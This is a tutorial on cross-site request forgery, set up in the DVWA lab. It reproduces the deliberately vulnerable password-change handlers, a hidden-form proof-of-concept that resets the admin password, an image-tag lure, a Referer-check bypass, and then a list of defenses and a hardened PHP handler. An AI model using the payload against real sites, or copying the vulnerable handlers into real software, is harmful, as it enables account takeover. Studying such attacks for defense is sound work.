WEB Security: CSRF

Posted by stickynote427 on Thu, 27 Jan 2022 01:20:21 +0100

Solemn declaration:
This note is prepared only to improve security knowledge and to share it with more people. Do not use the techniques described here for illegal activities; the consequences of doing so have nothing to do with the author. Maintaining network security is everyone's responsibility, as is jointly keeping the network civil and harmonious.

1 Introduction

CSRF definition: Cross-Site Request Forgery, also known as a one-click attack or session riding and usually abbreviated CSRF, is an attack that coerces a user into performing unintended operations on a web application in which they are currently logged in.

An authenticated user can normally access server resources. If an attacker sends that user a link to such a resource, for example a request that changes the password, and the user clicks it, the request is executed and the password is changed, because it is submitted with the user's already-authenticated, legitimate identity.

1.1 Difference between CSRF and XSS

From the perspective of trust:

XSS exploits the user's trust in the site: a script delivered by the server is executed in the client browser.

CSRF exploits the site's trust in the user's authenticated identity.

1.2 Hazards of CSRF

Requests are submitted involuntarily and unknowingly:

  • Modifying the account password and personal information (registered e-mail address, delivery address)
  • Sending forged business requests (online banking, shopping, voting)
  • Following other people's social accounts and publishing blog posts

1.3 Causes of CSRF

Lack of a secondary confirmation mechanism:

  • Generally speaking, from the server's point of view every request is legitimate because the user has already been authenticated. The lack of a confirmation step for key server-side operations is the root cause of this problem (a verification code, for example, can serve as that confirmation).

1.4 Exploitation conditions

  • The victim user has completed authentication
  • Submitting a new request requires no re-authentication or confirmation step
  • The attacker must know how the web application's request parameters are constructed
  • The user must be induced to trigger the attack (social engineering)

2 Verifying CSRF

2.1 Verification environment

Target: Metasploitable2, DVWA, security level: low, CSRF

Web server host: ensure that the target can reach the CSRF web page

<?php

if (isset($_GET['Change'])) {

    // Turn requests into variables
    $pass_new  = $_GET['password_new'];
    $pass_conf = $_GET['password_conf'];

    if (($pass_new == $pass_conf)) {
        $pass_new = mysql_real_escape_string($pass_new);
        $pass_new = md5($pass_new);

        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
        $result = mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>');

        echo "<pre> Password Changed </pre>";
        mysql_close();
    }
    else {
        echo "<pre> Passwords did not match. </pre>";
    }

}
?>

2.2 Build a web page that induces a click

Register a user on the target website, analyze the parameter structure of its web application requests, and build a web page that induces victims to click.

csrf.html
<html>
  <!-- CSRF PoC -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.100.129/dvwa/vulnerabilities/csrf/">
      <input type="hidden" name="password&#95;new" value="password1" />
      <input type="hidden" name="password&#95;conf" value="password1" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

2.3 Entice victims to click

Entice the victim to open the web page constructed above, through social engineering or other means, while the victim is logged in to the site:

<img src=http://web server IP/csrf.html />

Clicking completes the modification of the account password.

3 Medium level

<?php

if (isset($_GET['Change'])) {

    // Checks the http referer header
    if (eregi("127.0.0.1", $_SERVER['HTTP_REFERER'])) {

        // Turn requests into variables
        $pass_new  = $_GET['password_new'];
        $pass_conf = $_GET['password_conf'];

        if ($pass_new == $pass_conf) {
            $pass_new = mysql_real_escape_string($pass_new);
            $pass_new = md5($pass_new);

            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
            $result = mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>');

            echo "<pre> Password Changed </pre>";
            mysql_close();
        }
        else {
            echo "<pre> Passwords did not match. </pre>";
        }

    }

}
?>

In the source above a Referer check has been added: the password is changed only if the Referer header contains 127.0.0.1, that is, only when the request appears to come from the local host; otherwise nothing is executed.

Because the check only tests whether the string 127.0.0.1 appears somewhere in the header, you can try to bypass it by modifying the Referer of the request to http://web server IP/127.0.0.1

4 Defense strategy

Source: On CSRF - Jianshu (jianshu.com)

  • Validate the HTTP Referer field
  • Add a token to the request and verify it on the server
  • Add a custom attribute to the HTTP header and validate it
  • Add a verification code (CAPTCHA) check to the page
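The Medium source above only tests whether the string 127.0.0.1 appears anywhere in the Referer, and the Low source accepts a GET request carrying no secret at all. As an added example that is neither DVWA's code nor the original post's, the following PHP rewrites the same password-change handler with the first, second and fourth defenses from the list: a per-session synchronizer token compared in constant time, an exact host comparison of the Origin/Referer header instead of a substring search, and a current-password confirmation in place of a CAPTCHA. It keeps the `users` table from the page and the DVWA host 192.168.100.129 from the PoC; the `$pdo` connection, the `$_SESSION['user']` login marker and the `user_token` / `password_current` field names are assumptions, and it stores hashes with password_hash() rather than md5().

```php
<?php
// Added example, not DVWA's code: hardened version of the password-change handler.
// Assumes an existing PDO connection in $pdo and that login stored the user name
// in $_SESSION['user'] (both hypothetical). EXPECTED_HOST is the DVWA host from the PoC.
session_start();
const EXPECTED_HOST = '192.168.100.129';

// Defense 2: per-session synchronizer token, generated with a CSPRNG.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; a plain == would leak the token byte by byte through timing.
function csrf_token_valid(?string $submitted): bool {
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Defense 1 done properly: compare the host of Origin (or Referer as fallback)
// exactly against the expected host, so "http://attacker/127.0.0.1" no longer passes.
function same_origin(string $expectedHost): bool {
    $source = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    if ($source === '') {
        return false; // fail closed when neither header is present
    }
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

function fail(string $msg): void {
    http_response_code(403);
    echo '<pre>' . htmlspecialchars($msg, ENT_QUOTES, 'UTF-8') . '</pre>';
    exit;
}

// State changes only via POST: an <img src=...> or a GET form cannot reach this branch.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['Change'])) {
    if (!csrf_token_valid($_POST['user_token'] ?? null)) {
        fail('Invalid CSRF token.');
    }
    if (!same_origin(EXPECTED_HOST)) {
        fail('Request did not originate from this site.');
    }

    // Defense 4 (confirmation step): require the current password, a secret the
    // forging site does not hold, instead of a CAPTCHA.
    $current  = $_POST['password_current'] ?? '';
    $passNew  = $_POST['password_new'] ?? '';
    $passConf = $_POST['password_conf'] ?? '';
    $user     = $_SESSION['user'] ?? '';   // set at login (assumed)

    $stmt = $pdo->prepare('SELECT password FROM `users` WHERE user = ?');
    $stmt->execute([$user]);
    $stored = $stmt->fetchColumn();
    if ($stored === false || !password_verify($current, $stored)) {
        fail('Current password is incorrect.');
    }
    if ($passNew !== $passConf || strlen($passNew) < 12) {
        fail('Passwords did not match or are too short.');
    }

    // Parameterized update; the account comes from the session, not a hard-coded 'admin'.
    $stmt = $pdo->prepare('UPDATE `users` SET password = ? WHERE user = ?');
    $stmt->execute([password_hash($passNew, PASSWORD_DEFAULT), $user]);

    unset($_SESSION['csrf_token']); // rotate the token after a successful state change
    echo '<pre> Password Changed </pre>';
    exit;
}

// The legitimate form carries the token as a hidden field; a cross-site page cannot read it.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo <<<HTML
<form method="post" action="">
  <input type="hidden" name="user_token" value="{$token}" />
  <label>Current password <input type="password" name="password_current" /></label>
  <label>New password <input type="password" name="password_new" /></label>
  <label>Confirm <input type="password" name="password_conf" /></label>
  <input type="submit" name="Change" value="Change" />
</form>
HTML;
```

The Origin/Referer check fails closed, which also rejects browsers configured to strip the Referer; that is why it sits behind the token as a second layer rather than being the primary control. Setting the session cookie with SameSite=Lax or Strict adds a third layer, since the browser then does not attach the cookie to a form submitted from another site at all.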

Topics: Web Development security csrf metasploit